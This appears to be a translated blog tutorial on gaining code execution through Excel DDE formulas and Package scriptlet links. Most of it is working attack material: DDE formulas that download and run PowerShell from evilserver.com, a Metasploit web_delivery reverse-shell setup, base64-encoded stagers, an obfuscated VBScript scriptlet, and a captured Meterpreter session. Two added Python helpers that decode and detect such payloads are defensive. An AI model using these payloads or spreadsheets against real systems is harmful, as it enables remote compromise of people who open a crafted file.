0x00 Basics
DDE can execute arbitrary commands through Excel worksheet formulas, but it has two drawbacks, both requiring user interaction:
1. On opening, the user is prompted to enable content
2. On the second open, the user is prompted to update content
DDE works through inter-process communication. To keep data current it allows applications to be invoked from inside Excel, and live data can even be returned through a web request.
In addition, the executable name and its arguments are subject to length limits, so PowerShell.exe may not be launchable directly from DDE; this can be worked around by passing PowerShell.exe as an argument to cmd.exe. That adds more bytes to the already limited 1024-byte argument length; 1024 is the maximum command length for the CreateProcess() function.
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://evilserver.com/sp.base64\");powershell -e $e'!A1
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://evilserver.com/sp.ps1");IEX $e'!A1
=cmd|'/c \\evilserver.com\sp.bat;IEX $e'!A1
Of course, beyond the reverse shell demonstrated below there are more tricks,
for example privilege escalation directly from Excel, and so on:
https://gist.githubusercontent.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980/raw/0a3b7af41ac8c9a975cfeff2ab21c7eb5e6857a1/Modified-MS16-032.ps1
https://www.youtube.com/watch?v=fzyK6RFNfDU
0x01 Generating the PowerShell script with MSF
Original article: https://www.lastline.com/labsblog/when-scriptlets-attack-excels-alternative-to-dde-code-execution/
use exploit/multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.2
set lport 22222
set srvhost 10.10.10.2
set target 2
set ssl true
run -j
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN');
0x02 Special character conversion
Note:
In PowerShell, a base64 string built from UTF-8 fails to execute; the encoded command must be the base64 of the UTF-16LE bytes.
utf8 > base64: False
utf16-le > base64: True
bash
Note: pay attention to the double and single quotes I use here. The URL in the payload above is single-quoted; I changed it to double quotes.
# echo '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring("https://10.10.10.2:8080/QpxuaN")' |iconv --to-code UTF-16LE|base64
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACIAKQAKAA
Or save it to payload.txt first // remember the line breaks
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
$l=new-object net.webclient;
$l.proxy=[Net.WebRequest]::GetSystemWebProxy();
$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')
# cat payload.txt|iconv --to-code UTF-16LE|base64
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
python
In [1]: import base64
In [2]: x = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')"
In [3]: y = x.encode('UTF-16LE')
In [4]: base64.b64encode(y)
Out[4]: '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'
powershell[1]
PS> (cmd /c echo {[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')}).split('')[1]
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA=
powershell[2]
PS> $command="[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')"
PS> $byte=[System.Text.Encoding]::Unicode.GetBytes($command)
PS> $encodecomand=[Convert]::ToBase64String($byte)
PS> echo $encodecomand
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
Other variants:
https://github.com/danielbohannon/Invoke-Obfuscation
https://04z.net/archives/bf627292.html
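An added triage helper, not code from the post: it builds the UTF-16LE base64 form that -EncodedCommand accepts, locates such a blob in a logged process command line, decodes it, and reports whether the blob was UTF-16LE or the UTF-8 form the note above says fails. The command line, URL and indicator list are constructed assumptions for the example.

```python
import base64
import re

# Strings a triager would flag in a decoded command; the stagers shown
# on this page contain all of them.
INDICATORS = ("DownloadString", "IEX", "Invoke-Expression", "WebClient",
              "ServerCertificateValidationCallback")
# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENC_FLAG = re.compile(r"^-e(c|nc|ncoded|ncodedcommand)?$", re.I)


def encode_command(cmd: str) -> str:
    """Base64 in the form -EncodedCommand accepts: UTF-16LE bytes, not UTF-8."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


def decode_encoded_command(b64: str) -> tuple:
    """Decode an -EncodedCommand blob and report which encoding produced it.

    ASCII text in UTF-16LE has a zero byte in every odd position; a blob
    without them is the UTF-8 mistake described above, which PowerShell
    would reject."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    probe = raw[:64]
    if len(raw) % 2 == 0 and all(b == 0 for b in probe[1::2]):
        return "utf-16le", raw.decode("utf-16le")
    return "utf-8", raw.decode("utf-8", errors="replace")


def triage_cmdline(cmdline: str) -> dict:
    """Find the encoded-command argument in a process command line, decode
    it, and return the encoding, the clear text and indicator hits."""
    parts = cmdline.split()
    for i, part in enumerate(parts[:-1]):
        if ENC_FLAG.match(part):
            enc, text = decode_encoded_command(parts[i + 1])
            hits = [s for s in INDICATORS if s.lower() in text.lower()]
            return {"encoding": enc, "decoded": text, "indicators": hits}
    return {"encoding": None, "decoded": "", "indicators": []}


# Constructed samples (not the page's stager): a correctly encoded command
# as it appears in a process-creation log, and the same command wrongly
# encoded from UTF-8.
SAMPLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/sp.ps1')"
GOOD_LOG = "powershell.exe -ex bypass -nop -w hidden -Ec " + encode_command(SAMPLE_CMD)
BAD_LOG = "powershell.exe -nop -w hidden -enc " + base64.b64encode(SAMPLE_CMD.encode("utf-8")).decode("ascii")

if __name__ == "__main__":
    for log in (GOOD_LOG, BAD_LOG):
        print(triage_cmdline(log))
```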
0x03 Save the script content to an XML file
<?XML version="1.0"?>
<scriptlet>
<registration
description="KH9uSJNGgLpeK"
progid="aLqKTT.ba9f0i"
version="1.0"
classid="{D77A5972-210E-4FD6-BC1E-6094A40A1025}" remotable="true">
</registration>
<script language="VBScript">
<![CDATA[
if not vLQ then
dim tZnIOJNSxlFdPBXvNMkpDqNa : DiM xZdwuEqRiLPWuENFURdUOisq : Set tZnIOJNSxlFdPBXvNMkpDqNa = creaTEobjEcT(StrReverse(ChrW(&H57)) & ChrW(&H53) & Chr(&H63) & ChrW(&H72) & Chr(&H69) & StrReverse(Chr(&H70)) & ChrW(&H54) & StrReverse(Chr(&H2E)) & StrReverse(Chr(&H53)) & Chr(&H48) & StrReverse(ChrW(&H65)) & ChrW(&H6C) & ChrW(&H4C)):xZdwuEqRiLPWuENFURdUOisq=" poWERSHelL.EXe -ex ByPAss -noP -W Hidden -Ec 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 ":tZnIOJNSxlFdPBXvNMkpDqNa.rUn ChR(34)&tZnIOJNSxlFdPBXvNMkpDqNa.eXPaNDEnVIROnMENtStrinGs(StrReverse(ChrW(&H25)) & ChrW(&H43) & StrReverse(ChrW(&H4F)) & Chr(&H6D) & StrReverse(Chr(&H53)) & Chr(&H70) & StrReverse(ChrW(&H65)) & Chr(&H43) & StrReverse(ChrW(&H25)))&cHR(34)&CHR(34)&ChrW(&H2F) & StrReverse(Chr(&H43)) & Chr(&H20)&xZdwuEqRiLPWuENFURdUOisq&CHR(34),0:set tZnIOJNSxlFdPBXvNMkpDqNa = noThIng
end if
Function vLQ
Dim vFVw
Dim vdbGCrvsiz
Dim vUC
Set vFVw = GetObject("winmgmts:\\.\root\cimv2").ExecQuery(_
"Select * from Win32_Process where Name='cscript.exe' or Name='wscript.exe'",,48)
For Each vdbGCrvsiz in vFVw
If Instr(1,vdbGCrvsiz.CommandLine, WScript.ScriptName,1)> 0 Then
vUC = vUC + 1
End If
Next
vLQ = (vUC > 1)
End Function
]]>
</script>
</scriptlet>
0x04 Start an HTTP server with Python or similar
php -S 0.0.0.0:8081
python -m SimpleHTTPServer 8081
The link to x.xml is then http://10.10.10.2:8081/x.xml
0x05 Create a new Excel workbook, paste the following into any cell, and save
=Package|'script:http://10.10.10.2:8081/x.xml'!''''
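A detection helper added here, not code from the post: it recognises the =application|'topic'!item DDE shape used in 0x00 and the Package|'script:...' scriptlet form from 0x05 in exported cell text, and reports the application, topic and any remote location. The CSV sample and URL are constructed for the example.

```python
import csv
import io
import re

# DDE formula shape used on this page: =application|'topic'!item
# (Excel also treats +, - and @ as formula prefixes).
DDE_RE = re.compile(r"^\s*[=+\-@]\s*([A-Za-z][\w.]*)\s*\|\s*'(.*?)'\s*!(.*)$", re.S)
REMOTE_RE = re.compile(r"(https?://\S+|\\\\\S+)", re.I)


def classify_cell(value: str):
    """Return details of a DDE formula in a cell, or None for anything else."""
    m = DDE_RE.match(value)
    if not m:
        return None
    app, topic, item = m.groups()
    remote = REMOTE_RE.search(topic)
    return {
        "application": app,
        "topic": topic,
        "item": item,
        # Package|'script:...' is the scriptlet variant from 0x05.
        "scriptlet": app.lower() == "package" and topic.lower().startswith("script:"),
        "remote": remote.group(1) if remote else None,
    }


def scan_csv(text: str) -> list:
    """Scan every cell of CSV text (e.g. an exported sheet) for DDE formulas."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            hit = classify_cell(cell)
            if hit:
                findings.append({"row": r, "col": c, **hit})
    return findings


# Constructed sample sheet: one benign formula, one cmd DDE formula in the
# shape of 0x00, and one Package scriptlet formula in the shape of 0x05.
SAMPLE_CSV = (
    "name,amount,note\n"
    "alice,10,\"=SUM(B2:B3)\"\n"
    "bob,20,\"=cmd|'/c echo hello'!A1\"\n"
    "eve,30,\"=Package|'script:http://example.invalid/x.xml'!''''\"\n"
)

if __name__ == "__main__":
    for finding in scan_csv(SAMPLE_CSV):
        print(finding)
```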
0x06 Open the Excel file
Remember to allow Enable Content, or Update Content
[*] Sending stage (179779 bytes) to 10.10.10.27
[*] Meterpreter session 1 opened (10.10.10.2:22222 -> 10.10.10.27:49956) at 2017-12-19 20:45:30 +0800
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: X\evi1ox
https://www.youtube.com/watch?v=P-iCeH3qNLw
http://staaldraad.github.io/2017/10/23/msword-field-codes/
http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/
https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/
https://gist.githubusercontent.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980/raw/0a3b7af41ac8c9a975cfeff2ab21c7eb5e6857a1/Modified-MS16-032.ps1